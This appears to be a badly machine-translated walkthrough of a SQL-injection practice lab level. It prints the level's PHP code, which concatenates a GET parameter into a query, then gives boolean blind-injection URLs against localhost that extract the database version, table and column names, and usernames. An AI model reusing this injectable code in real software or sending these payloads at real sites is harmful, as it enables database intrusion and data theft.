View source code is as follows
$id=$_GET['id'];
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
echo '<font size="5" color="#FFFF00">';
echo 'You are in...........';
echo "<br>";
echo "</font>";
}
else
{
echo '<font size="5" color="#FFFF00">';
//echo 'You are in...........';
//print_r(mysql_error());
//echo "You have an error in your SQL syntax";
echo "</br></font>";
echo '<font color= "#0000ff" font size= 3>';
}
As can be seen, and less5 compared, less8 source code mysql error statement is commented, then this error injection to die off. You can use Boolean injection or delayed injection.
Here show you a Boolean injection.
First, look at the version ()
http://127.0.0.1/sql/Less-8/?id=1' and left(version(),1)='5' %23
Here's statement means is to look at the version number 5 is not the first, obvious result returned is correct.
When the version number is not the right time, you can not display correctly you are in ......
You can try out the database version number is 5.6.17
We can use the burp or Python script to improve efficiency.
Next, look at the length of the database
http://127.0.0.1/sql/Less-8/?id=1' and length(database())=8 %23
Length is 8, return incorrect results, indicating a length of 8.
I guess the first database
http://127.0.0.1/sql/Less-8/?id=1' and left(database(),1)>'n' --+
Database () is security, so we see his first whether> n, it is clear that s> n, and therefore the right to return. When without our knowledge, the dichotomy can be used to improve the injection efficiency.
Second guess Database
The first is that s, if we look at the top two is greater than sn
http://127.0.0.1/sql/Less-8/?id=1' and left(database(),2)>'sn' --+
Down the analogy, that the final database called security.
Get under the table security database
http://127.0.0.1/sql/Less-8/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>100--+
The same dichotomy here using the test until the test correctly.
Here it should be 101, because the first table is email.
How to get the second character of the first table it? We have learned a substr () function, where the use substr (**, 2,1) can be.
http://127.0.0.1/sql/Less-8/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))>108--+
How to get that second table it? think for a while!
Here you can see the above statement we limit 0,1 used. 0 means that from the beginning to get the first one. To get that second is not that limit 1,1!
http://127.0.0.1/sql/Less-8/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))>113--+
113 return is correct here, since the second table is referers table, so the first one is r.
After the process is constantly repeated above, will not repeat here the wheels made. Principle has been explained clearly.
When you run ended in accordance with the method, it is possible to get the names of all the tables.
Regexp acquired using canonical injection users listed in the table
http://127.0.0.1/sql/Less-8/?id=1' and 1=(select 1 from information_schema.columns where table_name='users' and column_name regexp '^us' limit 0,1)--+
Using the ord () and MID () function to get the contents of users table
http://127.0.0.1/sql/Less-8/?id=1' and ord(mid((select ifnull(cast(username as char),0x20) from security.users order by id limit 0,1),1,1))=68--+
Exactly the same methods and less 5 in the back, where it is not going to demonstrate, after a time can write a Python script to improve the injection efficiency.